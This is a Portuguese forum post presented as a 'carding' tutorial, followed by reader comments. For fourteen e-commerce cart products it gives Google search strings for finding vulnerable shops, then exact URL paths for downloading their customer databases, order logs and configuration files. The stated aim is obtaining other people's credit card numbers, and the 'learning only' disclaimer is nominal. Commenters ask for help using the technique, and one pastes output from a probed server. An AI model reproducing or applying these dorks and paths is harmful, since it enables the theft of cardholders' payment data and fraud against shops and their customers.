Tutorial sobre Carding bruno-tk — 23-10-2007 GTM 11 @ 10:44
NESTE TUTORIAL IREI MOSTRAR QUASE TODAS AS FORMAS POSSÍVEIS DE SE CONSEGUIR CARTÕES DE CRÉDITOS, NA INTERNET.
ESTE TEXTO É VOLTADO SOMENTE PARA APRENDIZADO, NÃO ME RESPONSABILIZO PELO USO INDEVIDO DO MESMO.
TODOS DIZEM QUE CARDING É UMA TAREFA DIFÍCEL, QUE PARA SER REALIZADA, O ATACANTE NECESSITA DE UM GRANDE CONHECIMENTO TÉCNICO.
FOI JUSTAMENTE POR ISSO QUE RESOLVI ESCREVER ESSE TUTO, DE UMA FORMA CLARA E OBJETIVA, SEM MUITA TEORIA, POIS DEVE SER ISSO QUE ESTÁ ATRAPALHANDO VOCÊS.
[Indíce]
[1] Bug AspCart5
[2] Bug CandyPress
[3] Bug Cart Hassan
[4] Bug Cart32
[5] Bug ccbill
[6] Bug Cyber office
[7] Bug Ezshopper 2.0 & 3.0
[8] Bug Fpdb
[9] Bug MidiCart
[10] Bug Perlshop.cgi
[11] Bug ProductCart
[12] Bug Quikstore
[13] Bug SoftCard
[14] BugWebStore
-----------------
[1] AspCart5[*]
-----------------
Bem aki estou outra vez, apanhar uma grande seca a escrever um tutorial, mas enfim é por uma boa causa. Então vamos la, mais conhecimento ai para o pessoal que quer se iniciar no carding..
Primeiro vc só tem de ir ao google e digitar:
allinurl:/backend/ no qual vão aparecer uma lista de sites.
Depois é só mudar a url:
Exemplo:
www.fhp.pt/backend/xxx.asp ---> URL Normal
www.fhp.pt/aspcart5.mdb ---> URL Modificada
Bem como viram é uma maneira muito fácil mas eficaz...
------------------
[2] CandyPress[*]
------------------
Primeiramente va até ao google e digite: allinurl:/candypress/ e ira aparecer os possiveis sites com bugs:
Exemplo:
www.fhp.pt/candypress/xxx/xxx.asp
Se aparecer uns sites parecidos com isto e so mudar assim como os exemplos abaixo:
www.fhp.pt/store.mdb
www.fhp.pt/storefront.mdb
www.fhp.pt/fpdb/storefront.mdb
www.fhp.pt/fpdb/store.mdb
Agora se aparecer uns sites tipo isto:
www.fhp.pt/xxx/candypress/xxx.asp
E so mudar a url como os exemplos abaixo:
www.fhp.pt/xxx/store.mdb
www.fhp.pt/xxx/storefront.mdb
www.fhp.pt/xxx/fpdb/storefront.mdb
www.fhp.pt/xxx/fpdb/store.mdb
[3] Cart Hassan[*]
-------------------
Esta falha permite vc ver o lugar onde estão os cc.
Primeiramente va ao google e digite allinurl:Shop.pl/page=
Agore vc só tem de trocar o que vier depois page= por shop.cfg isto parace um bocado confuso mas olhe para o exemplo:
www.fhp.pt/shop.pl/page=shop.cfg acho que ja percebeu, entao que tenha uma boa caça
---------------
[4] Cart32[*]
---------------
Primeiramente va ate ao google e digite allinurl:cart32.exe e serão exibidos uma lista de sites.
Depois é só mudar as urls como se segue nos exemplos baixo:
Exemplo:www.fhp.pt/cgi-bin/cart32/cart32page-orders.txt
www.fhp.pt/cgi-bin/cart32.ini
www.fhp.pt/cgi-bin/cart32/cart32page-output.txt
www.fhp.pt/cgi-bin/cart32.exe/cart32clientlist
www.fhp.pt/cgi-bin/cart32.exe/error
www.fhp.pt/scripts/cart32/cart32page-orders.txt
www.fhp.pt/scripts/cart32/cart32page-output.txt
www.fhp.pt/scripts/cart32.ini
www.fhp.pt/scripts/cart32.exe/error
www.fhp.pt/scripts/cart32.exe/cart32clientlist
---------------
[5] ccbill[*]
---------------
Primeiro tens de ir ao google e digitar allinurl:/ccbill/ e aparecera uma lista de sites, nos quais vc so tera de modificar a url como o meu exemplo.
exemplo:
www.fhp.pt/ccbill/
www.fhp.pt/ccbill/secure.order.log
www.fhp.pt/ccbill.log
www.fhp.pt/ccbill/secure/currenty.log
www.fhp.pt/currenty.log
--------------------
[6] Cyber office[*]
--------------------
Este bug permite vc fazer o download da database
Para isso tem de ir ao google e digitar allinurl:/shopping_cart/view_cart.asp
A database fica no directorio /_private/ e chama se Shopping_cart.mdb.
Por isso o site ficava assim www.fhp.pt/_private/Shopping_cart.mdb
Vc tb pode procurar no google por allinurl:/shopping_cart/
[7] Ezshopper 2.0 & 3.0[*]
---------------------------
Primeiramente va ao google e digite allinurl:loadpage.cgi.
Agora e so substituir as urls dos sites que apareceram como demonstra o exemplo em baixo referido:
Exemplo:
Ezshopper v2.0
www.fhp.pt/cgi-bin/ezshopper2/loadpage.cgi?id+/ URL Normal
http://www.fhp.pt/cgi-bin/ezshopper2...subdirectorio/ URL MUDADA
http://www.fhp.pt/cgi-bin/ezshopper3...r_id=id&file=/ UrL Normal
http://www.fhp.pt/cgi-bin/ezshopper3...subdirectorio/ URL MUdADA
------------
[8] Fpdb[*]
------------
Primeiramente va ate ao google e digite allinurl:mall/lobby.htm
Vc ira encontrar urls como estes exemplos:
Exemplo:
www.fhp.pt/mall/lobby.htm
www.fhp.pt/shoponline/mall/lobby.htm
Exemplo de como ficam as urls modificadas:
www.fhp.pt/fpdb/shop.mdb
www.fhp.pt/shoponline/fpdb.mdb
----------------
[9] MidiCart[*]
----------------
Para variar vamos ao google e digite allinurl: meny2.asp e vai aparecer uma lista de sites.
Agora e so mudar a urls..
Exemplo:
www.fhp.pt/meny2.asp
www.fhp.pt/midicart.mdb
www.fhp.pt/shop/meny2.asp
www.fhp.pt/shop/midicart.mdb
---------------------
[10] Perlshop.cgi[*]
---------------------
Primeiramente va ao google e digite allinurl:Perlshop.cgi
O que vc ta procurando são estes directorios:
/temp_customers/
/temp_orders/
/orders/
Exemplo:
www.fhp.pt/cgi-bin/perlshop/temp_orders/
www.fhp.pt/cgi-bin/perlshop/temp_customers/
Isto pode lhe fornecer informa?oes interessante do site...
--------------------
[11] ProductCart[*]
--------------------
Vou agora falar de um bug um pouco conhecido que é o productcart.
As versões bugadas são a 1.0 e 2.0
Na instalação de default,o arquivo de dados do carrinho de produto e localizado em /productcart/database/Eipc.mdb
Que pode ser acessado facilmente por qualquer ataque remoto.
Exemplo:
www.fhp.pt/productcart/database/EIPC.mdb
Pronto é tudo que vc pode obter acesso ao banco de dados
------------------
[12] Quikstore[*]
------------------
Primeiramente e so ir ao google ( para variar ) e pesquise allinurl:quikstore.cgi
Agora é so mudar os "sites" por estas urls como amostra nos exemplos:
www.fhp.pt/cgi-bin/log_files/access.log
www.fhp.pt/cgi-bin/log_files/error.log
www.fhp.pt/cgi-bin/orders/
www.fhp.pt/cgi-bin/orders/1001.1.log
www.fhp.pt/cgi-bin/database/
www.fhp.pt/cgi-bin/cb/
www.fhp.pt/cgi-bin/
http://www.fhp.pt/cgi-bin/quikstore.....html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....ohtml&cart_id=
-----------------
[13] Softcard[*]
-----------------
Primeiramente vai ate ao google e digite allinurl:softcart.exe
O que aparecerá são mts sites e vc so tem de procurar urls como este pequeno exemplo:
Exemplo:
www.fhp.pt/cgi-bin/orders/*.olf
www.fhp.pt/cgi-bin/pw/storemgr.pw
-----------------
[14] WebStore[*]
-----------------
Bem primeiramente vai ate ao google e digita allinurl:web_store.cgi e aparecera uma lista de sites:
Nas quais somente vc ira mudar a url como no exemplo abaixo referido.
Exemplo:
www.fhp.pt/admin_files/order.log
É isso ai
Do Melhor
Linkk
del.icio.us
09-02-2008 - 11:35:19 GMT 11
Primeiramente va ao google e digite allinurl:Shop.pl/page=
Agore vc só tem de trocar o que vier depois page= por shop.cfg isto parace um bocado confuso mas olhe para o exemplo:
www.fhp.pt/shop.pl/page=shop.cfg acho que ja percebeu, entao que tenha uma boa caça
depois disso fais oque ?
me explica por favor xD
12-03-2008 - 08:08:37 GMT 11
Essas falhas parecem de faz de conta! rsrsrs
27-05-2008 - 05:17:36 GMT 11
Cara, tu tem msn ou e-mail? Ta foda....não ta dando certo....eu tenho delphi 7 e uma source (kILLER), mas não sei usar...tem como vc me da uma força?
13-06-2008 - 09:02:17 GMT 11
15-07-2009 - 02:51:02 GMT 11
www.fhp.pt/shop.pl/page=shop.cfg
dpois disso o que eu ponho???
Aparece essa msg:
Hassan Consulting's Shopping Cart Version 1.57
Secure Module Version 1.08
Cybercash Express Module Version Not Enabled
Authorize.Net Module Version Not Enabled
Bank of America Module Version Not Enabled
LinkPoint Module Version Not Enabled
Mysql Module Version Not Enabled
shop.pl: Error opening HTML file: /home/users/web/b1093/moo.phoebe/shop/shop.cfg
04-12-2009 - 22:50:49 GMT 11
ola amigo tenho 2 bridge gostaria de saber se tem algum jeito de desbloquear aguardo respostas obrigad.............